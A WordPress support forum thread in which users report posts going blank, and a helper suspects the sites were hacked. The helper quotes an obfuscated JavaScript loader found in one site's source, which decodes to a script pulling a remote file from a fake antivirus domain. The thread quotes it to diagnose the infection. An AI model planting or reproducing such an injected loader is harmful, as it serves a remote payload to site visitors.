Support » Fixing WordPress » Entry content disappears, blog post left blank

Viewing 11 replies - 1 through 11 (of 11 total)
  • I have the same problem! Very annoying, has been like this in november! Possibly since mid october. The title of the article remains.

    I’m on version 2.0.5 if that has anything to do with it? Have I been hacked? Is it a bug?

    my site: http://www.diggfotball.com

    whooami

    (@whooami)

    Member

    watchmojo,

    <!– generator=”wordpress/2.1.3″ –>

    I wouldnt be surprised if your site was hacked.

    same goes for the other person.

    Not sure what you expect when you continue to use insecure sofware.

    whooami

    (@whooami)

    Member

    in fact, whats THIS in your source, mujo:

    <SCRIPT LANGUAGE="JavaScript">
    <!--
    function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!39!104!116!116!112!58!47!47!119!105!110!100!111!119!115!45!97!110!116!105!118!105!114!117!115!45!50!48!48!56!46!99!111!109!47!119!112!46!106!115!39!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
    //-->
    </SCRIPT><SCRIPT LANGUAGE="JavaScript">
    <!--
    Decode();
    //-->
    </SCRIPT>

    In which file whas the javascript found? Where can I go delete it? Will an upgrade help this issue whooami?

    Need some more help on this one. Will an upgrade help?

    >The upgrade didn’t seem to help, how do I get rid of this hack?

    thank you Whooami, but the question then is: what page do I remove that from?

    I did a Find and Replace in the entire folder trying to find it, and could not…

    Any suggestions are appreciated?

    I’m having this same problem as well. Did you guys figure out how to fix it?

    Hey I actually have a solution to this one and it is posted on The MarketSecrets Blog!!!!

    Hope this helps…

    the same happened to me

    db repair hasn’t solved the issue

    This problem occurs for me only when dealing with captions. It isn’t a DB problem at all; it has something to do with the way WP handles the captions.

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘Entry content disappears, blog post left blank’ is closed to new replies.